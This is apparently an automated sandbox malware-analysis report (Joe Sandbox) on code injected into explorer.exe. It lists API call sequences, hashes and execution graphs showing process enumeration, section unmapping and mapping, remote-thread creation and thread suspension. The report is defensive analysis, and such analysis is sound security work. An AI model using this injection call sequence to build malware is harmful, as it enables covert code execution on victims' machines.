                                                                                                                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3827878703-0
                                                                                                                                                                                                                              • Opcode ID: 7272143b47f68b96d980a7ef01985f98dfb2708de35509eaddfde581879468bd
                                                                                                                                                                                                                              • Instruction ID: 7f02c476de4b27a36a91da0602c44102f3b2fc68f8a33da4a76facdbed89e9f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7272143b47f68b96d980a7ef01985f98dfb2708de35509eaddfde581879468bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6331B6B6702212ABCB58CF2ACD84B66B7D8FF15354B08457CE845C7201D735E996C7A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000), ref: 030412BC
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 030412CE
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 030412E1
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 030412F7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 331459951-0
                                                                                                                                                                                                                              • Opcode ID: 966b3c3b8c4309d418a2a4ce33b56a87dc706b61e5edd32f4c4fceda4f7e4c28
                                                                                                                                                                                                                              • Instruction ID: 0daf0749a47f47fbfa5977df1ebd4e0f1966b5d5800197678a0c28c6c9544d06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 966b3c3b8c4309d418a2a4ce33b56a87dc706b61e5edd32f4c4fceda4f7e4c28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90F090F5807218FF9B14DFE1AA449EEB7BCEA05251F14426AE801D2140D7344F52A6A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(03046038), ref: 03043332
                                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(03046038), ref: 03043358
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                                                              • API String ID: 3168844106-1814004025
                                                                                                                                                                                                                              • Opcode ID: 79ccae71b52dd2e4c381b4e7c5cacbbd553f4f2deaa2ff71f1536c7faabcf0b3
                                                                                                                                                                                                                              • Instruction ID: 3bbfbcb5aa3b72b790456cccb5484ba15265c3caec697c228f53afab2fadd6ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79ccae71b52dd2e4c381b4e7c5cacbbd553f4f2deaa2ff71f1536c7faabcf0b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A701D6B9103208FBCB31AF11E94889F7BADEF8276271C0470F90996115EF36DB60D6A4

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:7.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:42.9%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:49
                                                                                                                                                                                                                              Total number of Limit Nodes:5
                                                                                                                                                                                                                              execution_graph 1483 714914 1495 711d08 CreateToolhelp32Snapshot 1483->1495 1486 711d08 4 API calls 1487 714941 1486->1487 1488 711d08 4 API calls 1487->1488 1489 71494d SleepEx 1488->1489 1494 714962 1489->1494 1490 714a18 1491 7149e0 1491->1490 1492 711eb4 6 API calls 1491->1492 1492->1490 1494->1491 1501 711eb4 1494->1501 1496 711d7a 1495->1496 1497 711d2c Process32First 1495->1497 1496->1486 1500 711d44 1497->1500 1498 711d71 CloseHandle 1498->1496 1499 711d5f Process32Next 1499->1500 1500->1498 1500->1499 1509 711db0 1501->1509 1503 711ed6 1504 711efd FindFirstFileW 1503->1504 1505 711f8f 1504->1505 1508 711f14 1504->1508 1505->1494 1506 711f74 FindNextFileW 1507 711f86 FindClose 1506->1507 1506->1508 1507->1505 1508->1506 1510 711dde 1509->1510 1511 711dfb FindFirstFileW 1510->1511 1512 711e12 1511->1512 1513 711e8e 1511->1513 1514 711e73 FindNextFileW 1512->1514 1516 711eb4 3 API calls 1512->1516 1513->1503 1514->1512 1515 711e85 FindClose 1514->1515 1515->1513 1516->1512 1524 71d637 1525 71d62e 1524->1525 1527 71d6f8 1525->1527 1528 71d748 1525->1528 1530 71d74d 1528->1530 1529 71d835 LoadLibraryA 1529->1530 1530->1529 1532 71d884 VirtualProtect VirtualProtect 1530->1532 1534 71d879 1530->1534 1533 71d912 1532->1533 1533->1533 1534->1527 1517 71d748 1519 71d74d 1517->1519 1518 71d835 LoadLibraryA 1518->1519 1519->1518 1521 71d884 VirtualProtect VirtualProtect 1519->1521 1523 71d879 1519->1523 1522 71d912 1521->1522 1522->1522 1535 71d5da 1536 71d614 1535->1536 1537 71d748 3 API calls 1536->1537 1538 71d6f8 1536->1538 1537->1538

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_00711B74 1 Function_00711576 2 Function_00716279 3 Function_00714A7C 4 Function_0071277C 11 Function_00712964 4->11 15 Function_00712754 4->15 73 Function_007118D0 4->73 5 Function_0071317C 7 Function_00711860 5->7 23 Function_00713048 5->23 49 Function_0071311C 5->49 5->73 102 Function_00713094 5->102 6 Function_0071D57E 71 Function_00711BE8 7->71 8 Function_00711560 9 Function_00713F60 9->7 42 Function_00712214 9->42 72 Function_007118E8 9->72 112 Function_0071268C 9->112 10 Function_0071CD63 104 Function_0071299C 11->104 12 Function_00712368 12->7 27 Function_00711838 12->27 28 Function_00711938 12->28 65 Function_007118F8 12->65 12->73 103 Function_00712298 12->103 115 Function_0071188C 12->115 13 Function_0071156C 14 Function_00714B6F 16 Function_00711254 17 Function_00714C5C 18 Function_0071345C 18->27 18->71 18->115 19 Function_00714B5E 20 Function_00714540 20->71 80 Function_00713FC0 20->80 107 Function_00714280 20->107 21 Function_00714C42 22 Function_00713B48 22->5 40 Function_00712F10 22->40 23->27 24 Function_0071D748 59 Function_0071D70A 24->59 25 Function_00713E4C 25->7 25->27 26 Function_0071D637 26->24 29 Function_00712838 30 Function_0071343C 31 Function_00713C3C 31->18 31->22 31->72 32 Function_00713F20 32->25 33 Function_00711822 34 Function_00713424 35 Function_00711C28 36 Function_0071D42D 37 Function_00714B2E 38 Function_00714C2E 39 Function_00714710 56 Function_00711A04 39->56 63 Function_00713CF0 39->63 66 Function_00713FF8 39->66 39->71 39->72 39->73 39->80 101 Function_00714094 39->101 40->27 41 Function_00714C14 42->27 43 Function_00712B14 44 Function_00714914 44->7 44->27 57 Function_00711D08 44->57 89 Function_00711EB4 44->89 45 Function_0071D416 46 Function_00713818 46->7 46->27 46->56 61 Function_0071370C 46->61 70 Function_007121E4 46->70 46->72 46->73 99 Function_00713690 46->99 47 Function_0071141D 48 Function_0071211C 50 Function_00714B1E 51 Function_00711000 52 Function_00712C00 52->43 52->71 81 Function_007129C0 52->81 53 Function_00715300 53->27 53->53 55 Function_00715104 53->55 53->71 109 Function_00714C80 53->109 54 Function_00711405 55->0 55->27 55->28 55->32 55->35 55->52 55->56 55->71 84 Function_00711BC8 55->84 93 Function_00711CA0 55->93 106 Function_00711C80 55->106 74 Function_00711CD0 57->74 58 Function_00711508 60 Function_0071CC0D 61->56 62 Function_00713AF0 62->46 67 Function_007135FC 62->67 63->30 63->31 63->34 63->62 63->71 97 Function_00713CAC 63->97 116 Function_00713B8C 63->116 64 Function_007114F9 66->56 67->7 67->71 68 Function_007145E0 68->71 68->80 68->107 69 Function_0071CCE2 75 Function_007172D0 76 Function_007114D4 77 Function_00711FD4 77->7 77->27 77->77 86 Function_00711FB0 77->86 78 Function_007128D4 78->15 78->29 78->71 79 Function_0071D5DA 79->24 82 Function_0071D0C3 83 Function_0071D4C4 85 Function_00711DB0 85->7 85->27 85->89 113 Function_00711D8C 85->113 87 Function_00714BB0 88 Function_007114B2 89->7 89->27 89->85 89->113 90 Function_0071CFB7 91 Function_00714BB8 92 Function_0071D0BB 94 Function_00714BA0 95 Function_007144A4 95->63 95->80 95->101 96 Function_00714AA9 97->18 98 Function_00713A90 98->7 98->42 98->72 98->112 99->56 100 Function_0071CD92 101->7 101->27 101->56 101->66 102->7 102->27 111 Function_00712F88 102->111 105 Function_00713D9C 107->7 107->27 107->56 108 Function_00714680 108->71 108->80 108->107 109->4 109->7 109->27 109->48 109->71 109->78 109->105 114 Function_00711A8C 109->114 110 Function_00712F84 112->7 112->12 112->27 115->27 116->18 116->22 116->56 116->72

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE ref: 00711E03
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE ref: 00711E7B
                                                                                                                                                                                                                              • FindClose.KERNELBASE ref: 00711E88
                                                                                                                                                                                                                                • Part of subcall function 00711EB4: FindFirstFileW.KERNELBASE ref: 00711F05
                                                                                                                                                                                                                                • Part of subcall function 00711EB4: FindNextFileW.KERNELBASE ref: 00711F7C
                                                                                                                                                                                                                                • Part of subcall function 00711EB4: FindClose.KERNELBASE ref: 00711F89
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_711000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                                              • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                                                                                              • Instruction ID: 0fe722373229c343645c118eb87a4dd3e038b1b10fbeb3309985f01644da6978
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A821953031CE088BDB58FB2CA8992A937D1EB98351F40465DE94EC72D6DE38D94587C5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00711DB0: FindFirstFileW.KERNELBASE ref: 00711E03
                                                                                                                                                                                                                                • Part of subcall function 00711DB0: FindNextFileW.KERNELBASE ref: 00711E7B
                                                                                                                                                                                                                                • Part of subcall function 00711DB0: FindClose.KERNELBASE ref: 00711E88
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE ref: 00711F05
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE ref: 00711F7C
                                                                                                                                                                                                                              • FindClose.KERNELBASE ref: 00711F89
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_711000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                                              • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                                                                                              • Instruction ID: 53b92593e879031f4efdc25e9580f8fc44845d91f7107a333a99670577cf396a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D121657021CA488FDF44FF2CA4993A977E1FBA8304F40066DA65AC71D2DF38D9858785

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 137 715300-715310 call 711be8 140 715390-715395 137->140 141 715312-715345 call 711838 137->141 145 715371-71538a NtUnmapViewOfSection 141->145 146 715347 call 711838 141->146 148 71539c-7153ab call 715104 145->148 149 71538c-71538e 145->149 151 71534c-715365 146->151 156 7153b5-7153be 148->156 157 7153ad-7153b0 call 715300 148->157 149->140 152 715396-71539b call 714c80 149->152 151->145 152->148 157->156
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 00715378
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_711000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                                              • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                                                                                              • Instruction ID: 7d19ab47d7c2b78b1829469406c8aa583c388f4ac67b7e08db6133f13bfcd164
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B110620611D098FEB5DFBBC949D2B93395EB54311F54403AE425C72E1DA2DCAC08300

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_711000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                              • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                                                                                              • Instruction ID: e668fd4112737807ac814d8b35e78b198d926bd1e6f49d0f44fddda0645c2b34
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7014430208A088FD755EF2CE8487AE76E2FBD8315F40462DA19AC6194DB38D9858745

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 10 71d748-71d74b 11 71d755-71d759 10->11 12 71d765 11->12 13 71d75b-71d763 11->13 14 71d767 12->14 15 71d74d-71d753 12->15 13->12 16 71d76a-71d771 14->16 15->11 18 71d773-71d77b 16->18 19 71d77d 16->19 18->19 19->16 20 71d77f-71d782 19->20 21 71d784-71d792 20->21 22 71d797-71d7a4 20->22 23 71d794-71d795 21->23 24 71d7ce-71d7e9 21->24 32 71d7a6-71d7a8 22->32 33 71d7be-71d7cc call 71d70a 22->33 23->22 25 71d81a-71d81d 24->25 27 71d822-71d829 25->27 28 71d81f-71d820 25->28 31 71d82f-71d833 27->31 30 71d801-71d805 28->30 34 71d807-71d80a 30->34 35 71d7eb-71d7ee 30->35 36 71d835-71d84e LoadLibraryA 31->36 37 71d884-71d88d 31->37 39 71d7ab-71d7b2 32->39 33->11 34->27 40 71d80c-71d810 34->40 35->27 43 71d7f0 35->43 42 71d84f-71d856 36->42 38 71d890-71d899 37->38 44 71d89b-71d89d 38->44 45 71d8be-71d90e VirtualProtect * 2 38->45 56 71d7b4-71d7ba 39->56 57 71d7bc 39->57 46 71d7f1-71d7f5 40->46 47 71d812-71d819 40->47 42->31 49 71d858-71d86e 42->49 43->46 50 71d8b0-71d8bc 44->50 51 71d89f-71d8ae 44->51 53 71d912-71d917 45->53 46->30 54 71d7f7-71d7f9 46->54 47->25 61 71d870-71d877 49->61 62 71d879-71d883 49->62 50->51 51->38 53->53 58 71d919-71d928 53->58 54->30 55 71d7fb-71d7ff 54->55 55->30 55->34 56->57 57->33 57->39 61->42
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 0071D847
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0071D8E5
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 0071D903
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.000000000071C000.00000040.80000000.00040000.00000000.sdmp, Offset: 0071C000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_71c000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                                              • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                                                                                              • Instruction ID: a4f7ae1c4dd50f0f3c81d0d6b8db00b9de81a6eb4a88a0b6876b73ae2841159e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6051673225891D4BCB38AA7C9CC43F5B7D1F759325B58063AC49AC32C5EA5CDCC68B81

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 108 711b74-711b94 OpenFileMappingA 109 711bb7-711bc4 108->109 110 711b96-711bb4 MapViewOfFile 108->110 110->109
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_711000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                                              • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                                                                                              • Instruction ID: 2a6d8ced01ba2495985756f805e5f728776ac28c279e2e90ebc11292fb769307
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3F08C34318F094FAB44EF7C9C8C136B7E0EBA8202B048A7EA94AC7164EF34C8808701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 111 714914-71496f call 711d08 * 3 SleepEx call 711838 120 714977-714979 111->120 121 7149e0-7149f4 120->121 122 71497b-71498e 120->122 125 7149f6-714a13 call 711eb4 121->125 126 714a18-714a2f 121->126 127 714994-7149de call 711838 call 711eb4 call 711860 122->127 125->126 127->121
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00711D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00711D1D
                                                                                                                                                                                                                                • Part of subcall function 00711D08: Process32First.KERNEL32 ref: 00711D3C
                                                                                                                                                                                                                                • Part of subcall function 00711D08: CloseHandle.KERNELBASE ref: 00711D74
                                                                                                                                                                                                                                • Part of subcall function 00711D08: Process32Next.KERNEL32 ref: 00711D67
                                                                                                                                                                                                                              • SleepEx.KERNELBASE ref: 00714952
                                                                                                                                                                                                                                • Part of subcall function 00711EB4: FindFirstFileW.KERNELBASE ref: 00711F05
                                                                                                                                                                                                                                • Part of subcall function 00711EB4: FindNextFileW.KERNELBASE ref: 00711F7C
                                                                                                                                                                                                                                • Part of subcall function 00711EB4: FindClose.KERNELBASE ref: 00711F89
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_711000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1868932505-0
                                                                                                                                                                                                                              • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                                                                                              • Instruction ID: 9c010cd851773848674af447d8280533063dfc5e50189052265980d99954992e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A31A931618A088FDB59FF6CE8995EA73E2FB98301B50472ED54BC71A1DE38D94587C0

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:10.3%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:306
                                                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                                                              execution_graph 707 321000 708 321010 707->708 709 321007 707->709 711 321016 709->711 760 322608 VirtualQuery 711->760 714 321097 714->708 716 32102c RtlMoveMemory 717 321071 NtUnmapViewOfSection GetCurrentProcessId 716->717 718 32104d 716->718 719 321092 717->719 720 32109e 717->720 797 322861 GetProcessHeap RtlAllocateHeap 718->797 719->714 722 321095 719->722 763 3210a4 720->763 798 321332 722->798 724 321052 RtlMoveMemory 724->717 725 3210a3 727 322861 GetProcessHeap RtlAllocateHeap 725->727 728 3210cc 727->728 729 3210dc CreateToolhelp32Snapshot 728->729 730 321322 Sleep 729->730 731 3210f0 Process32First 729->731 730->729 732 32131b CloseHandle 731->732 733 32110c lstrcmpiA 731->733 732->730 734 321124 lstrcmpiA 733->734 756 321280 733->756 736 321138 lstrcmpiA 734->736 734->756 735 3225ad OpenProcess IsWow64Process IsWow64Process CloseHandle 735->756 737 32114c lstrcmpiA 736->737 736->756 738 321160 lstrcmpiA 737->738 737->756 740 321170 lstrcmpiA 738->740 738->756 739 321305 Process32Next 739->733 741 321319 739->741 742 321184 lstrcmpiA 740->742 740->756 741->732 743 321198 lstrcmpiA 742->743 742->756 744 3211ac lstrcmpiA 743->744 743->756 745 3211c0 lstrcmpiA 744->745 744->756 746 3211d4 lstrcmpiA 745->746 745->756 747 3211e8 lstrcmpiA 746->747 746->756 749 3211fc lstrcmpiA 747->749 747->756 748 322608 VirtualQuery 748->756 750 32120c lstrcmpiA 749->750 749->756 752 32121c lstrcmpiA 750->752 750->756 751 3212ae lstrcmpiA 751->756 753 32122c lstrcmpiA 752->753 752->756 754 32123c lstrcmpiA 753->754 753->756 754->756 757 32124c lstrcmpiA 754->757 755 321819 30 API calls 755->756 756->735 756->739 756->748 756->751 756->755 757->756 758 32125c lstrcmpiA 757->758 758->756 759 32126c lstrcmpiA 758->759 759->739 759->756 761 32101e 760->761 761->714 762 322861 GetProcessHeap RtlAllocateHeap 761->762 762->716 825 322861 GetProcessHeap RtlAllocateHeap 763->825 765 3210cc 766 3210dc CreateToolhelp32Snapshot 765->766 767 321322 Sleep 766->767 768 3210f0 Process32First 766->768 767->766 769 32131b CloseHandle 768->769 770 32110c lstrcmpiA 768->770 769->767 771 321124 lstrcmpiA 770->771 793 321280 770->793 773 321138 lstrcmpiA 771->773 771->793 774 32114c lstrcmpiA 773->774 773->793 775 321160 lstrcmpiA 774->775 774->793 777 321170 lstrcmpiA 775->777 775->793 776 321305 Process32Next 776->770 778 321319 776->778 779 321184 lstrcmpiA 777->779 777->793 778->769 780 321198 lstrcmpiA 779->780 779->793 781 3211ac lstrcmpiA 780->781 780->793 782 3211c0 lstrcmpiA 781->782 781->793 783 3211d4 lstrcmpiA 782->783 782->793 784 3211e8 lstrcmpiA 783->784 783->793 786 3211fc lstrcmpiA 784->786 784->793 785 322608 VirtualQuery 785->793 787 32120c lstrcmpiA 786->787 786->793 789 32121c lstrcmpiA 787->789 787->793 788 3212ae lstrcmpiA 788->793 790 32122c lstrcmpiA 789->790 789->793 791 32123c lstrcmpiA 790->791 790->793 791->793 794 32124c lstrcmpiA 791->794 793->776 793->785 793->788 826 3225ad OpenProcess 793->826 832 321819 793->832 794->793 795 32125c lstrcmpiA 794->795 795->793 796 32126c lstrcmpiA 795->796 796->776 796->793 797->724 878 322861 GetProcessHeap RtlAllocateHeap 798->878 800 321340 GetModuleFileNameA 879 322861 GetProcessHeap RtlAllocateHeap 800->879 802 321357 GetCurrentProcessId wsprintfA 880 32263e CryptAcquireContextA 802->880 805 32139c Sleep 885 3224d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 805->885 806 32140d 903 322843 806->903 810 3213ae GetModuleHandleA GetProcAddress 812 3213da GetModuleHandleA GetProcAddress 810->812 813 3213c9 810->813 811 322843 3 API calls 814 32141b RtlExitUserThread 811->814 816 321406 812->816 817 3213f5 812->817 893 321de3 813->893 818 321425 814->818 820 3224d5 10 API calls 816->820 819 321de3 3 API calls 817->819 821 32144b 818->821 822 322608 VirtualQuery 818->822 819->816 820->806 821->720 823 32143a 822->823 823->821 908 321493 823->908 825->765 827 322600 826->827 828 3225cb IsWow64Process 826->828 827->793 829 3225ee 828->829 830 3225dc IsWow64Process 828->830 831 3225f9 CloseHandle 829->831 830->829 830->831 831->827 833 322608 VirtualQuery 832->833 834 321833 833->834 835 321845 OpenProcess 834->835 836 321a76 834->836 835->836 837 32185e 835->837 836->793 838 322608 VirtualQuery 837->838 839 321865 838->839 839->836 840 321873 NtSetInformationProcess 839->840 841 32188f 839->841 840->841 863 321a80 841->863 844 321a80 2 API calls 845 3218d6 844->845 846 321a73 CloseHandle 845->846 847 321a80 2 API calls 845->847 846->836 848 321900 847->848 869 321b17 848->869 851 321a80 2 API calls 852 321930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 851->852 853 321985 852->853 854 321a4e CreateRemoteThread 852->854 856 32198b CreateMutexA GetLastError 853->856 859 3219bb GetModuleHandleA GetProcAddress ReadProcessMemory 853->859 855 321a65 CloseHandle 854->855 858 321a67 CloseHandle CloseHandle 855->858 856->853 857 3219a7 CloseHandle Sleep 856->857 857->856 858->846 860 321a47 859->860 861 3219ec WriteProcessMemory 859->861 860->855 860->858 861->860 862 321a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 861->862 862->860 864 321a94 863->864 865 3218b4 863->865 866 321aa4 NtCreateSection 864->866 867 321ac3 864->867 865->844 866->867 867->865 868 321ad8 NtMapViewOfSection 867->868 868->865 870 321b2e 869->870 876 321b60 869->876 871 321b30 RtlMoveMemory 870->871 871->871 871->876 872 321bc3 873 321910 NtUnmapViewOfSection 872->873 875 321be1 LdrProcessRelocationBlock 872->875 873->851 874 321b71 LoadLibraryA 874->873 874->876 875->872 875->873 876->872 876->874 877 321ba1 GetProcAddress 876->877 877->873 877->876 878->800 879->802 881 322664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 880->881 882 321384 CreateMutexA GetLastError 880->882 883 3226aa wsprintfA 881->883 882->805 882->806 883->883 884 3226cc CryptDestroyHash CryptReleaseContext 883->884 884->882 886 322515 885->886 887 322565 CloseHandle 886->887 888 322555 Thread32Next 886->888 889 322521 OpenThread 886->889 887->810 888->886 890 322544 ResumeThread 889->890 891 32253c SuspendThread 889->891 892 32254a CloseHandle 890->892 891->892 892->888 894 321ded 893->894 902 321e56 893->902 894->902 935 321e93 